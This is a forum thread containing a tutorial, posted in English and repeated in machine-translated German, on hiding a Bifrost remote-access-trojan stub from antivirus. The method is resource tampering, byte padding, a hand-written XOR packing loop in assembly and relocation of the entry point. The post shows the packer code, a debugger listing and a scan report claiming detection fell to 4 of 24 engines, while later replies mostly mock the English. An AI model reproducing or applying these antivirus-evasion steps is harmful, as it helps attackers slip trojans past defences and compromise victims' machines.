How to undetect Bifrost stubs the manual way by haZl0oh !

[haZl0oh]

How to undetect Bifrost stubs the manual way by haZl0oh !

Ok guys ....

first of all ya need following tools/stuff...

- Reshacker
- Some icon of your choose
- some handy hexeditor ( your favourite )
- Some example PE file ( i choosed the bifrost client )


in this example i took the bifrost 1.2d stub
novirusthx scan
was 23/24





1. change the icon

take reshacker and drag and drop your stub file into it.
goto icon group ressource and open it ...

change the icon to your favourite one
( better take one who isn´t often seen in malware )

save it and step one is done....

2. open your pe file you choose ... in my case bifrost client
put this into reshacker and save your version info ressource
to a file...

now close reshacker open it again an drag n drop your stub into it again....


now action >>>> add a new ressoure

open your saved version info ressource

ressource type : version info
ressource name : 1
ressource language : 1033


save it ... done


3.
add a visual maniferst into your stub
do it with tools w2ho are abled to or do it again with resshacker ( by the way ...awesome tool like ya see ...lol)

now when ya added your visual manifest


4.

add some bytes with your hexeditor
i gave 200 bytes @ the end of file .....
works for my choose yaself

i also changed the 00 from offset 230 till 3ff to 11....

now after all these things the heavyest step comes ....
lol

maybe ...


MANUAL Packing & EP Moving!!!


5.


some days ago i drove by car and badabang .. i had an idea
why dont xor a file from back to start ?!?!?!?
i tried and it worked for me....

Code:

so my code is very easy :

( call it a beginner code )


xor bl,bl
mov esi, "end address of the code are you want to pack" 
dec bl
xor byte ptr ds:[esi],bl   <<<< ****
dec esi
cmp esi, " start adress of the code ya wanna pack"
JGE "address of xor byte ptr ds:[eax],bl"  ****
call "address of real OEP"
ret

now move your new ep into the image import descriptor range

it looks like these here:



========================================


00407D90 . CC7D0000 DD 00007DCC ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407D94 > $ B8 AA7E4000 MOV EAX,jmp_eax_.00407EAA <<<< my EP
00407D99 ? FFE0 JMP EAX
00407D9B ? 90 NOP
00407D9C . 2E7E0000 DD 00007E2E
00407DA0 . 00100000 DD 00001000
00407DA4 . F07D0000 DD 00007DF0 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DA8 . 00000000 DD 00000000
00407DAC . 00000000 DD 00000000
00407DB0 . 4A7E0000 DD 00007E4A
00407DB4 . 24100000 DD 00001024
00407DB8 . 00000000 DD 00000000 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DBC . 00000000 DD 00000000
00407DC0 . 00000000 DD 00000000
00407DC4 . 00000000 DD 00000000
00407DC8 . 00000000 DD 00000000

======================================


run your xor code and then save your new UD stub !!!

now plce the entrypoint in lord pe to the place where YOU placed ya NEW EP
my one was here "00407D94"


and it´s done with these easy steps your stub is almost to any AV undetected
i scanned my one and it was ..:


File Info

Report generated: 24.1.2009 at 23.27.26 (GMT 1)
Filename: 123.exe
File size: 80 KB
MD5 Hash: 980763A46F83883B1CAD7558411A5557
SHA1 Hash: B927C0FDA27210C59F366F2167866832B0430374
Packer detected: PEncrypt 3.1 Final -> junkcode [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 4 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - GenPack:RAT.Spy.Banker.AAUT
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - W32/Midgare.A.gen!Eldorado
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Win32/Bifrose.NFJ
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - RAT.Win32.Midgare.hhn
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org



I won´t post my stub here coz i want the users to test it by them self !

If ya like it gimme some thx or Reputation ....

[Sarge_stoni]

evtl auf deutsch Google übersetzer ftw xD

Wie undetect Bifrost Stubs die manuelle Weise durch haZl0oh!

Ok Jungs ....

Zunächst ya müssen folgende Werkzeuge / stuff ...

- Reshacker
- Einige Symbol Ihrer Wahl
- Einige nützliche hexeditor (your favourite)
- Einige Beispiel PE-Datei (ich wählte die Bifrost-Client)


In diesem Beispiel habe ich den Bifrost 1.2d Stub
novirusthx Scan
war 23/24





1. das Symbol

nehmen reshacker und Drag & Drop Ihre Stub-Datei hinein.
goto Gruppe Ressource Symbol und öffnen Sie es ...

das Symbol Ihrer bevorzugten ein
(Besser ein, die nicht oft in Malware)

speichern und Schritt ist getan ....

2. Öffnen Sie die PE-Datei, die Sie wählen ... in meinem Fall Bifrost-Client
setzen diese in reshacker und speichern Sie Ihre Version Infos Ressource
in eine Datei ...

jetzt nahe reshacker öffnen Sie es wieder eine Drag n Drop in Ihre Stub wieder ....


Jetzt Aktion>>>> eine neue ressoure

Öffnen Sie die gespeicherte Version Infos Ressource

Ressource-Typ: Version Infos
Ressource Name: 1
Ressource Sprache: 1033


speichern ... getan


3.
eine visuelle maniferst in Ihre Stub
tun Sie es mit Tools w2ho werden konnte oder es wieder tun mit resshacker (durch die Art und Weise ... awesome Tool wie ya sehen ... lol)

jetzt, wenn ya hinzugefügt Visual Manifest


4.

einige Bytes mit Ihrem hexeditor
Ich habe 200 Bytes @ das Ende der Datei .....
Arbeiten, die für meine Wahl yaself

Ich habe auch die 00 von Offset 230 bis 3ff bis 11 ....

jetzt nach all den Dingen, die der heavyest Schritt kommt ....
lol

vielleicht ...


MANUAL Verpackung & EP Umzug!


5.


vor einigen Tagen fuhr ich mit dem Auto und badabang .. Ich hatte eine Idee
Warum keine xor eine Datei aus zurück zum Anfang ?!?!?!?
Ich habe versucht und es funktionierte für mich ....


Code:

Also hat mein Code ist sehr einfach:

(Nennen sie es ein Anfänger-Code)


xor bl, bl
mov esi, "End-Adresse des Codes sind Sie zu packen"
Dezember bl
xor byte ptr ds: [esi], bl <<<<****
Dezember esi
cmp esi, "Start-Adresse des Code ya wollen Pack"
JGE "Adresse xor byte ptr ds: [eax], bl" ****
Call "-Adresse des realen OEP"
ret

nun Ihre neue EP in das Bild importieren Schlagwort Reihe

Es sieht aus, wie diese hier:



========================================


00407D90. CC7D0000 DD 00007DCC; Strukt "IMAGE_IMPORT_DESCRIPTOR"
00407D94> $ B8 AA7E4000 MOV EAX, jmp_eax_.00407EAA <<<<meine EP
00407D99? FFE0 JMP EAX
00407D9B? 90 nop
00407D9C. 2E7E0000 DD 00007E2E
00407DA0. 00100000 DD 00001000
00407DA4. F07D0000 DD 00007DF0; Strukt "IMAGE_IMPORT_DESCRIPTOR"
00407DA8. 00000000 DD 00000000
00407DAC. 00000000 DD 00000000
00407DB0. 4A7E0000 DD 00007E4A
00407DB4. 24100000 DD 00001024
00407DB8. 00000000 DD 00000000; Strukt "IMAGE_IMPORT_DESCRIPTOR"
00407DBC. 00000000 DD 00000000
00407DC0. 00000000 DD 00000000
00407DC4. 00000000 DD 00000000
00407DC8. 00000000 DD 00000000

======================================


xor Sie Ihren Code und speichern Sie dann Ihre neue UD Stub!

jetzt plce die EntryPoint in Herrn pe der Ort, an dem Sie sich ya NEW EP
meine war hier "00407D94"


und es ist mit diesen einfachen Schritten Ihre Stub ist fast jeder AV unentdeckt
Ich meine gescannt, und es war ..:

[blackberry]

Dein Englisch ist grauenhaft :S (du fügst mir damit starke seelische Schmerzen zu...)
Außerdem gibt es bereits ein umfassenderes Tutorial von Dizzy_D.

[Z o D]

sowohl das englische Original, als auch die deutsche Übersetzung sind grauenhaft

[gf0x]

hazzloh wäre es möglich dass ich dich mal in icq oder so adden könnte?

[haZl0oh]

kannst mir deine per pm schicken wenn ich zeit habe adde ich dich


typisch deutsches schul englisch hier

nichmal die amis motzen so viel wie ihr ^^

find ich schon komisch ...

[VeXx]

die sind toleranter ^^ die übersetzung ist von google...

[blackberry]

Ich kann nicht glauben, dass sich niemand darüber beschwert hat o_O

// das Wort gibt es nicht
How to undetect Bifrost [...]
// fehlender Artikel
first of all ya need the following tools/stuff...
[...]
- Some icon of your choose // das Wort heißt choice
[...]
// choose ist unregelmäßig: i have chosen
- Some example PE file ( i choosed the bifrost client )
// used passt besser; took halte ich für falsch - bin mir aber nicht sicher
in this example i took the bifrost 1.2d stub
[...]
// which - das icon ist keine Person
( better take one who isn´t often seen in malware )
// open the pe file of your choice
2. open your pe file you choose
[...]
// it
put this into reshacker
[...]
// ressource
now action >>>> add a new ressoure
[...]
// add a visual manifest to your stub
add a visual maniferst into your stub
[...]
// eine 2 und ein d zuviel...
do it with tools w2ho are abled to or do it again with resshacker
[...]
// added to (added at sollte auch gehen)
i gave 200 bytes @ the end of file .....
[...]
// choice, yourself - der Satz gefällt mir trotzdem nicht
works for my choose yaself
[...]
// at offset 230 to 3FF to 11
i also changed the 00 from offset 230 till 3ff to 11....
[...]
// things are done...
now after all these things the heavyest step comes ....
[...]
// tried it...
i tried and it worked for me....
[...]
// this /that
it looks like these here:
[...]
// place (wenn aber set) - der Satz ist außerdem grammatikalisch inkorrekt:
// now use LordPE to set the entrypoint to the RVA of your code
now plce the entrypoint in lord pe to the place where YOU placed ya NEW EP
my one was here "00407D94"
[...]
// falsche Wortstellung: is almost undetected to any AV
// der erste Satzteil gefällt mir auch nicht
and it´s done with these easy steps your stub is almost to any AV undetected
[...]
// and received the following result(s)
i scanned my one and it was ..:
[...]
// themselves
// to test? try passt besser
I won´t post my stub here coz i want the users to test it by them self !

(ja, ich habe nichts besseres zu tun - bzw. benutze ich das als Vorwand um mich vor meinen Hausaufgaben zu drücken - nicht böse sein)

mfG. BlackBerry

PS: Umgangssprache (ich habe nicht einmal YOU gelesen...) und Zeichensetzung (!!!) habe ich mal ausgespart

[haZl0oh]

also ich werde verstanden und es lernen leute dadurch sogar noch etwas also kanns nich so schlimm sein

[hpoc]

Vorallem werden gewissen Leute dass nicht mal auf Deutsch verstehen, wie kommst du auf die Idee dass sie es auf Englisch verstehen?